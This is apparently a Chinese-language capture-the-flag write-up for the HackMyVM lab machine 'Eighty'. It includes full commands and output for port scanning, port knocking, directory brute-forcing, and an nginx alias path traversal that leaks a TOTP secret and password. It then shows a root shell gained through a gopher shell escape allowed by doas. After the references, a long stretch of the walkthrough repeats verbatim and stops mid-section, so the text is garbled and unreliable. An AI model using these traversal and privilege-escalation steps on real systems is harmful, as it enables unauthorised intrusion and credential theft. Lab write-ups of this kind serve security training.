![\"image-20250613212723981\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910908.png\")
<\/div>\n
![\"image-20250614080611298\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910910.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.104:22\nOpen 192.168.10.104:70\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 c9:ce:d7:2a:f9:48:25:65:a9:33:4b:d5:01:e1:2c:52 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmERs5H1i0qPP1SXqPrbDTd0Kg6sUJiYT\/5m7Lx2jHMvkn1LSZTu8e87vzavsaZbsey9PeW6WAkP4XLE4JMdsdb1mntupUVzw7dNInN3g2gNkSjTD24Mz0GQ\/wdtGjgZrwRN3WGVQxtY+cQ05PWzHx7w5eIMLlzQl4+7mT0Rl0nuaGNDByYN3FSQdLBLIwzgDGUrZPDCCbI6ZgVSC0MRB\/c1tfKv8bz9o1IGaFsdStYuk7D2B+dPiQny1eneJJDQE01ohS4SOSqDxaQUr1+rYRBzWpzjh7jW4BZmUQ8L9CxwY3GiEedkOXG1eXkKvbJIJXVHaRwdcAhuXvuqjpMYhx\n| 256 7e:3d:4d:b4:82:0b:13:eb:db:50:e3:60:70:f0:4a:ad (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJgkAvIrs5fzCXuAgy35rbxOpHmq4\/IhDW903PdkqJABNiPcYON5Pe+1dWxrBeN7wJ5mKym4CS75M9mBtH68V3Y=\n| 256 7f:9d:13:c8:7b:d9:37:1d:cb:ff:e9:ce:f5:90:c3:32 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFRjfuHVzxnsIjDywzY2yc24Wl3h3vc4TAAiDr5iLGqV\n70\/tcp open http syn-ack ttl 64 pygopherd web-gopher gateway\n|_http-title: Gopher\n| http-methods: \n|_ Supported Methods: GET HEAD\n| gopher-ls: \n|_[txt] \/howtoconnect.txt "Connection"\nMAC Address: 08:00:27:46:5B:79 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
\u53d1\u73b070<\/code>\u7aef\u53e3\u6709\u4e9b\u4e1c\u897f\uff0c\u770b\u770b\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ curl -s http:\/\/$IP:70\/howtoconnect.txt\nPing us to: 4767 2343 3142<\/code><\/pre>\n\u5c1d\u8bd5 knock\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ knock $IP 4767 2343 3142<\/code><\/pre>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.104:70\nOpen 192.168.10.104:80\n\nPORT STATE SERVICE REASON VERSION\n70\/tcp open http syn-ack ttl 64 pygopherd web-gopher gateway\n|_http-title: Gopher\n| http-methods: \n|_ Supported Methods: GET HEAD\n| gopher-ls: \n|_[txt] \/howtoconnect.txt "Connection"\n80\/tcp open http syn-ack ttl 64 nginx 1.14.2\n| http-methods: \n|_ Supported Methods: GET HEAD\n|_http-title: Site doesn't have a title (text\/html).\n|_http-server-header: nginx\/1.14.2\nMAC Address: 08:00:27:46:5B:79 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)<\/code><\/pre>\n22 \u7aef\u53e3\u53c8\u5173\u6389\u4e86\u3002\u3002\u3002\u3002\u7ee7\u7eed\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.10.104\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: html,php,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 16]\n\/robots.txt (Status: 200) [Size: 18]<\/code><\/pre>\n\u654f\u611f\u76ee\u5f55<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ curl -s http:\/\/$IP\/robots.txt \n\/nginx_backup.txt\n\n# wget http:\/\/$IP\/nginx_backup.txt \n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ cat nginx_backup.txt \nserver {\n listen 80 default_server;\n listen [::]:80 default_server;\n root \/var\/www\/html;\n index index.html index.htm index.nginx-debian.html;\n server_name _;\n location \/ {\n try_files $uri $uri\/ =404;\n }\n}\n\nserver {\nserver_name henry.eighty.hmv;\nroot \/var\/www\/html;\nindex index.html index.htm index.nginx-debian.html;\n location \/web {\n alias \/home\/henry\/web\/;\n }\n }\n\nserver {\nserver_name susan.eighty.hmv;\nroot \/var\/www\/html;\nindex index.html index.htm index.nginx-debian.html;\n location \/web {\n alias \/home\/susan\/web\/;\n }\n }<\/code><\/pre>\n\u5f97\u5230\u4e86\u4e24\u4e2a\u57df\u540d\u89e3\u6790\uff1a<\/p>\n
192.168.10.104 henry.eighty.hmv susan.eighty.hmv<\/code><\/pre>\n\u5c1d\u8bd5\u6dfb\u52a0\u5230\/etc\/hosts<\/code>\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ gobuster dir -u http:\/\/henry.eighty.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/henry.eighty.hmv\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,txt,html\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 16]\n\/web (Status: 301) [Size: 185] [--> http:\/\/henry.eighty.hmv\/web\/]\n\/robots.txt (Status: 200) [Size: 18]\nProgress: 882240 \/ 882244 (100.00%)\n===============================================================\nFinished\n===============================================================\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ feroxbuster -u http:\/\/susan.eighty.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php 2>\/dev\/null\n\n404 GET 7l 12w 169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200 GET 2l 4w 16c http:\/\/susan.eighty.hmv\/\n200 GET 2l 4w 16c http:\/\/susan.eighty.hmv\/index.html\n301 GET 7l 12w 185c http:\/\/susan.eighty.hmv\/web => http:\/\/susan.eighty.hmv\/web\/\n200 GET 2l 7w 40c http:\/\/susan.eighty.hmv\/web\/index.html\n200 GET 1l 1w 18c http:\/\/susan.eighty.hmv\/robots.txt\n200 GET 1l 3w 50c http:\/\/susan.eighty.hmv\/web\/lostpasswd.txt\n[####################] - 21m 1764368\/1764368 0s found:6 errors:0 \n[####################] - 21m 882184\/882184 712\/s http:\/\/susan.eighty.hmv\/ \n[####################] - 21m 882184\/882184 712\/s http:\/\/susan.eighty.hmv\/web\/<\/code><\/pre>\n\u5f97\u5230\u4e86\u65b0\u7684\u76ee\u5f55\uff0c\u5c1d\u8bd5\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ curl -s http:\/\/susan.eighty.hmv\/robots.txt\n\/nginx_backup.txt\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ curl http:\/\/susan.eighty.hmv\/web\/lostpasswd.txt\n8ycrois-tu0 + \/home\/susan\/secret\/.google-auth.txt<\/code><\/pre>\nTOTP\u8ba4\u8bc1\u767b\u5f55ssh<\/h3>\n
\u5f97\u5230\u4e86\u5bc6\u78018ycrois-tu0<\/code>\u3002\u7136\u540e\u6ce8\u610f\u5230\u4e0a\u9762\u7684nginx<\/code>\u914d\u7f6e\u6587\u4ef6\u4e2d\uff1a<\/p>\nserver {\nserver_name susan.eighty.hmv;\nroot \/var\/www\/html;\nindex index.html index.htm index.nginx-debian.html;\n location \/web {\n alias \/home\/susan\/web\/;\n }\n }<\/code><\/pre>\n\u53d1\u73b0\u53ef\u4ee5\u5c1d\u8bd5\u8fdb\u884c\u76ee\u5f55\u7a7f\u8d8a\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ curl http:\/\/susan.eighty.hmv\/web..\/secret\/.google-auth.txt \n2GN7KARBONVR55R7SP3UZPN3ZM\n" RATE_LIMIT 3 30\n" WINDOW_SIZE 17\n" DISALLOW_REUSE\n" TOTP_AUTH\n71293338\n48409754\n27074208\n60216448\n17908010<\/code><\/pre>\n\u53d1\u73b0\u662fTOTP_AUTH<\/code>\uff1a<\/p>\n\nTOTP\uff08Time-based One-Time Password\uff0c\u57fa\u4e8e\u65f6\u95f4\u7684\u4e00\u6b21\u6027\u5bc6\u7801\uff09\u662f\u4e00\u79cd\u5e7f\u6cdb\u5e94\u7528\u4e8e\u53cc\u56e0\u7d20\u8eab\u4efd\u9a8c\u8bc1\uff082FA\uff09\u7684\u52a8\u6001\u5bc6\u7801\u6280\u672f\uff0c\u901a\u8fc7\u7ed3\u5408\u5171\u4eab\u5bc6\u94a5\u548c\u65f6\u95f4\u6233\u751f\u6210\u77ed\u671f\u6709\u6548\u7684\u9a8c\u8bc1\u7801\u3002<\/p>\n<\/blockquote>\n
![\"image-20250614084143934\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u4f46\u662f\u8fd9\u4e2a\u7528\u4e0d\u4e86\uff0c\u6362\u4e00\u4e2a\uff1a<\/p>\n
<\/div><\/p>\n\u53f3\u4e0a\u89d2\u6253\u5f00\u63d2\u4ef6\uff0c\u8eab\u4efd\u9a8c\u8bc1\u5668 > \u6dfb\u52a0\u8d26\u53f7 > \u624b\u52a8\u8f93\u5165 > susan:2GN7KARBONVR55R7SP3UZPN3ZM<\/code>\uff1a<\/p>\n<\/div><\/p>\n\u5c1d\u8bd5\u8fdb\u884c ssh \u767b\u5f55\uff0c\u8fc7\u671f\u5c31\u6362\u4e00\u4e2a\uff01<\/p>\n
\u5bc6\u7801\u8981\u586b8ycrois-tu0<\/code>\uff08\u4e0d\u77e5\u9053\u548b\u51fa\u6765\u7684\u53ef\u4ee5ctrl+f<\/code>\u770b\u4e00\u4e0b\u7b2c\u4e00\u6b21\u51fa\u73b0\u5728\u54ea\uff09,\u8ba4\u8bc1\u7801\u5c31\u586b\u521a\u521a\u63d2\u4ef6\u7ed9\u7684\uff1a<\/p>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nsusan@eighty:~$ ls -la\ntotal 52\ndrwxr-xr-x 6 susan susan 4096 Jun 13 20:48 .\ndrwxr-xr-x 4 root root 4096 Apr 7 2021 ..\n-rw-r--r-- 1 susan susan 220 Apr 7 2021 .bash_logout\n-rw-r--r-- 1 susan susan 3526 Apr 7 2021 .bashrc\n-rwx--x--x 1 susan susan 1920 Apr 7 2021 flag.sh\ndrwx------ 3 susan susan 4096 Apr 7 2021 .gnupg\n-r-------- 1 susan susan 156 Jun 13 20:48 .google_authenticator\ndrwxr-xr-x 3 susan susan 4096 Apr 7 2021 .local\n-rw-r--r-- 1 susan susan 807 Apr 7 2021 .profile\ndrwxr-xr-x 2 susan susan 4096 Apr 7 2021 secret\n-rw------- 1 susan susan 12 Apr 7 2021 user.txt\ndrwxr-xr-x 2 susan susan 4096 Apr 7 2021 web\n-rw------- 1 susan susan 52 Apr 7 2021 .Xauthority\nsusan@eighty:~$ cat user.txt \nhmv8use0red\nsusan@eighty:~$ .\/flag.sh \n\\033[0;35m\n . ** \n * *. \n ,* \n *, \n , ,* \n ., *, \n \/ * \n ,* *, \n \/. .*. \n * ** \n ,* ,* \n ** *. \n ** **. \n ,* ** \n *, ,* \n * ** \n *, .* \n *. ** \n ** ,*, \n ** *, \\033[0m\n-------------------------\n\\nPWNED HOST: eighty\n\\nPWNED DATE: Fri 13 Jun 2025 08:50:05 PM EDT\n\\nWHOAMI: uid=1000(susan) gid=1000(susan) groups=1000(susan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\n\\nFLAG: hmv8use0red\n\\n------------------------\n\nsusan@eighty:~$ sudo -l\n-bash: sudo: command not found\n\nsusan@eighty:~$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\nsusan\nsshd\nhenry\n\nsusan@eighty:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/local\/bin\/doas\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/chfn\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh\n\/usr\/bin\/mount<\/code><\/pre>\n\u53d1\u73b0doas<\/code>\u7684SUID<\/code>\u6743\u9650\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u7528\u6765\u4ee3\u66ff sudo \u770b\u4e00\u4e0b\u662f\u548b\u7528\u7684\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ tldr doas \n\n Executes a command as another user.\n More information: <https:\/\/man.openbsd.org\/doas>.\n\n Run a command as root:\n\n doas command\n\n Run a command as another user:\n\n doas -u user command\n\n Launch the default shell as root:\n\n doas -s\n\n Parse a configuration file and check if the execution of a command as another user is allowed:\n\n doas -C config_file command\n\n Make `doas` request a password even after it was supplied earlier:\n\n doas -L<\/code><\/pre>\n\u770b\u4e00\u4e0b\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\n
<\/div><\/p>\n\u4f46\u662f\u6211\u5728\u76ee\u6807\u4e3b\u673a\u6ca1\u770b\u5230\u76f8\u5173\u76ee\u5f55\uff1a<\/p>\n
susan@eighty:~$ find \/ -name "*doas*" 2>\/dev\/null\n\/usr\/local\/etc\/doas.conf\n\/usr\/local\/share\/man\/man1\/doas.1\n\/usr\/local\/share\/man\/man8\/vidoas.8\n\/usr\/local\/share\/man\/man5\/doas.conf.5\n\/usr\/local\/bin\/vidoas\n\/usr\/local\/bin\/doas<\/code><\/pre>\n\u4f7f\u7528 find \u627e\u5230\u4e86\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\n
susan@eighty:~$ cat \/usr\/local\/etc\/doas.conf\npermit nolog susan as root cmd gopher<\/code><\/pre>\n\u8bf4\u660e susan<\/code>\u53ef\u4ee5\u7528root<\/code>\u6267\u884cgopher<\/code>\uff1a\u770b\u4e00\u4e0b\u8fd9\u4e2a\u662f\u5565\uff0c\u4f3c\u4e4e\u548c\u6211\u719f\u6089\u7684\u90a3\u4e2a\u534f\u8bae\u770b\u4e0a\u53bb\u4e0d\u592a\u4e00\u6837\uff1a<\/p>\nsusan@eighty:~$ gopher -h\ngopher: invalid option -- 'h'\nUsage: gopher [-sSbDr] [-T type] [-p path] [-t title] [hostname port]+\n -s secure mode, users without own account\n -S secure mode, users with own account\n -p path specify path to initial item\n -T type Type of initial item\n -i Search argument (for -T 7)\n -b Bookmarks first\n -r Remote user\n -D Debug mode<\/code><\/pre>\n\u5c1d\u8bd5\u8fd0\u884c\uff1a<\/p>\n
susan@eighty:~$ \/usr\/local\/bin\/doas -u root gopher\nPassword: 8ycrois-tu0\nWelcome to the wonderful world of Gopher!\n\nGopher has limitations on its use and comes without\na warranty. Please refer to the file 'Copyright' included\nin the distribution.\n\nInternet Gopher Information Client 3.0 patch12 (FurryTerror)\nCopyright (C) 1991-2000 by the Regents of the University of Minnesota\nCopyright (C) 2000-2005 John Goerzen and the gopher developers\n\nPress RETURN to continue<\/code><\/pre>\n\u968f\u4fbf\u6309\u4e00\u4e2a\u952e\u8fdb\u5165\u754c\u9762\uff0c\u5c1d\u8bd5\u641c\u5bfb\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u53ef\u4ee5\u6267\u884c\u547d\u4ee4\u7684\u5730\u65b9\uff1a<\/p>\n
<\/div>
\n<\/div>
\n<\/div>
\n<\/div><\/p>\n\u53d1\u73b0!, $ : Shell Escape (Unix) or Spawn subprocess (VMS).<\/code>\u5c1d\u8bd5\u8fdb\u884c\u9003\u9038\uff1a\u8f93\u5165\u4fe9u<\/code>\u8fdb\u5165\u6700\u5f00\u59cb\u7684\u754c\u9762\uff0c\u7136\u540e\u8f93\u5165!<\/code>\u53d1\u73b0\u8fdb\u5165shell\uff01<\/p>\n<\/div><\/p>\nroot@eighty:\/home\/susan# cd ~\nroot@eighty:~# ls -la\ntotal 32\ndrwx------ 4 root root 4096 Jun 13 21:04 .\ndrwxr-xr-x 18 root root 4096 Apr 7 2021 ..\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwx------ 3 root root 4096 Apr 7 2021 .gnupg\n-rw-r--r-- 1 root root 0 Jun 13 21:04 .gopherrc\ndrwxr-xr-x 3 root root 4096 Apr 7 2021 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rwx--x--x 1 root root 1920 Apr 7 2021 fl4g.sh\n-rw------- 1 root root 13 Apr 7 2021 r0ot.txt\nroot@eighty:~# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@eighty:~# .\/fl4g.sh\n\\033[0;35m\n . ** \n * *. \n ,* \n *, \n , ,* \n ., *, \n \/ * \n ,* *, \n \/. .*. \n * ** \n ,* ,* \n ** *. \n ** **. \n ,* ** \n *, ,* \n * ** \n *, .* \n *. ** \n ** ,*, \n ** *, \\033[0m\n-------------------------\n\\nPWNED HOST: eighty\n\\nPWNED DATE: Fri Jun 13 21:10:02 EDT 2025\n\\nWHOAMI: uid=0(root) gid=0(root) groups=0(root)\n\\nFLAG: rooted80shmv\n\\n------------------------<\/code><\/pre>\n\u53c2\u8003<\/h2>\n
https:\/\/nepcodex.com\/2023\/01\/writeup-eighty-hackmyvm-walkthrough\/<\/a><\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.104:22\nOpen 192.168.10.104:70\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 c9:ce:d7:2a:f9:48:25:65:a9:33:4b:d5:01:e1:2c:52 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmERs5H1i0qPP1SXqPrbDTd0Kg6sUJiYT\/5m7Lx2jHMvkn1LSZTu8e87vzavsaZbsey9PeW6WAkP4XLE4JMdsdb1mntupUVzw7dNInN3g2gNkSjTD24Mz0GQ\/wdtGjgZrwRN3WGVQxtY+cQ05PWzHx7w5eIMLlzQl4+7mT0Rl0nuaGNDByYN3FSQdLBLIwzgDGUrZPDCCbI6ZgVSC0MRB\/c1tfKv8bz9o1IGaFsdStYuk7D2B+dPiQny1eneJJDQE01ohS4SOSqDxaQUr1+rYRBzWpzjh7jW4BZmUQ8L9CxwY3GiEedkOXG1eXkKvbJIJXVHaRwdcAhuXvuqjpMYhx\n| 256 7e:3d:4d:b4:82:0b:13:eb:db:50:e3:60:70:f0:4a:ad (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJgkAvIrs5fzCXuAgy35rbxOpHmq4\/IhDW903PdkqJABNiPcYON5Pe+1dWxrBeN7wJ5mKym4CS75M9mBtH68V3Y=\n| 256 7f:9d:13:c8:7b:d9:37:1d:cb:ff:e9:ce:f5:90:c3:32 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFRjfuHVzxnsIjDywzY2yc24Wl3h3vc4TAAiDr5iLGqV\n70\/tcp open http syn-ack ttl 64 pygopherd web-gopher gateway\n|_http-title: Gopher\n| http-methods: \n|_ Supported Methods: GET HEAD\n| gopher-ls: \n|_[txt] \/howtoconnect.txt "Connection"\nMAC Address: 08:00:27:46:5B:79 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
\u53d1\u73b070<\/code>\u7aef\u53e3\u6709\u4e9b\u4e1c\u897f\uff0c\u770b\u770b\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ curl -s http:\/\/$IP:70\/howtoconnect.txt\nPing us to: 4767 2343 3142<\/code><\/pre>\n\u5c1d\u8bd5 knock\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ knock $IP 4767 2343 3142<\/code><\/pre>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.104:70\nOpen 192.168.10.104:80\n\nPORT STATE SERVICE REASON VERSION\n70\/tcp open http syn-ack ttl 64 pygopherd web-gopher gateway\n|_http-title: Gopher\n| http-methods: \n|_ Supported Methods: GET HEAD\n| gopher-ls: \n|_[txt] \/howtoconnect.txt "Connection"\n80\/tcp open http syn-ack ttl 64 nginx 1.14.2\n| http-methods: \n|_ Supported Methods: GET HEAD\n|_http-title: Site doesn't have a title (text\/html).\n|_http-server-header: nginx\/1.14.2\nMAC Address: 08:00:27:46:5B:79 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)<\/code><\/pre>\n22 \u7aef\u53e3\u53c8\u5173\u6389\u4e86\u3002\u3002\u3002\u3002\u7ee7\u7eed\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.10.104\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: html,php,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 16]\n\/robots.txt (Status: 200) [Size: 18]<\/code><\/pre>\n\u654f\u611f\u76ee\u5f55<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ curl -s http:\/\/$IP\/robots.txt \n\/nginx_backup.txt\n\n# wget http:\/\/$IP\/nginx_backup.txt \n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ cat nginx_backup.txt \nserver {\n listen 80 default_server;\n listen [::]:80 default_server;\n root \/var\/www\/html;\n index index.html index.htm index.nginx-debian.html;\n server_name _;\n location \/ {\n try_files $uri $uri\/ =404;\n }\n}\n\nserver {\nserver_name henry.eighty.hmv;\nroot \/var\/www\/html;\nindex index.html index.htm index.nginx-debian.html;\n location \/web {\n alias \/home\/henry\/web\/;\n }\n }\n\nserver {\nserver_name susan.eighty.hmv;\nroot \/var\/www\/html;\nindex index.html index.htm index.nginx-debian.html;\n location \/web {\n alias \/home\/susan\/web\/;\n }\n }<\/code><\/pre>\n\u5f97\u5230\u4e86\u4e24\u4e2a\u57df\u540d\u89e3\u6790\uff1a<\/p>\n
192.168.10.104 henry.eighty.hmv susan.eighty.hmv<\/code><\/pre>\n\u5c1d\u8bd5\u6dfb\u52a0\u5230\/etc\/hosts<\/code>\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ gobuster dir -u http:\/\/henry.eighty.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/henry.eighty.hmv\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,txt,html\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 16]\n\/web (Status: 301) [Size: 185] [--> http:\/\/henry.eighty.hmv\/web\/]\n\/robots.txt (Status: 200) [Size: 18]\nProgress: 882240 \/ 882244 (100.00%)\n===============================================================\nFinished\n===============================================================\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ feroxbuster -u http:\/\/susan.eighty.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php 2>\/dev\/null\n\n404 GET 7l 12w 169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200 GET 2l 4w 16c http:\/\/susan.eighty.hmv\/\n200 GET 2l 4w 16c http:\/\/susan.eighty.hmv\/index.html\n301 GET 7l 12w 185c http:\/\/susan.eighty.hmv\/web => http:\/\/susan.eighty.hmv\/web\/\n200 GET 2l 7w 40c http:\/\/susan.eighty.hmv\/web\/index.html\n200 GET 1l 1w 18c http:\/\/susan.eighty.hmv\/robots.txt\n200 GET 1l 3w 50c http:\/\/susan.eighty.hmv\/web\/lostpasswd.txt\n[####################] - 21m 1764368\/1764368 0s found:6 errors:0 \n[####################] - 21m 882184\/882184 712\/s http:\/\/susan.eighty.hmv\/ \n[####################] - 21m 882184\/882184 712\/s http:\/\/susan.eighty.hmv\/web\/<\/code><\/pre>\n\u5f97\u5230\u4e86\u65b0\u7684\u76ee\u5f55\uff0c\u5c1d\u8bd5\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ curl -s http:\/\/susan.eighty.hmv\/robots.txt\n\/nginx_backup.txt\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ curl http:\/\/susan.eighty.hmv\/web\/lostpasswd.txt\n8ycrois-tu0 + \/home\/susan\/secret\/.google-auth.txt<\/code><\/pre>\nTOTP\u8ba4\u8bc1\u767b\u5f55ssh<\/h3>\n
\u5f97\u5230\u4e86\u5bc6\u78018ycrois-tu0<\/code>\u3002\u7136\u540e\u6ce8\u610f\u5230\u4e0a\u9762\u7684nginx<\/code>\u914d\u7f6e\u6587\u4ef6\u4e2d\uff1a<\/p>\nserver {\nserver_name susan.eighty.hmv;\nroot \/var\/www\/html;\nindex index.html index.htm index.nginx-debian.html;\n location \/web {\n alias \/home\/susan\/web\/;\n }\n }<\/code><\/pre>\n\u53d1\u73b0\u53ef\u4ee5\u5c1d\u8bd5\u8fdb\u884c\u76ee\u5f55\u7a7f\u8d8a\uff1a<\/p>\n
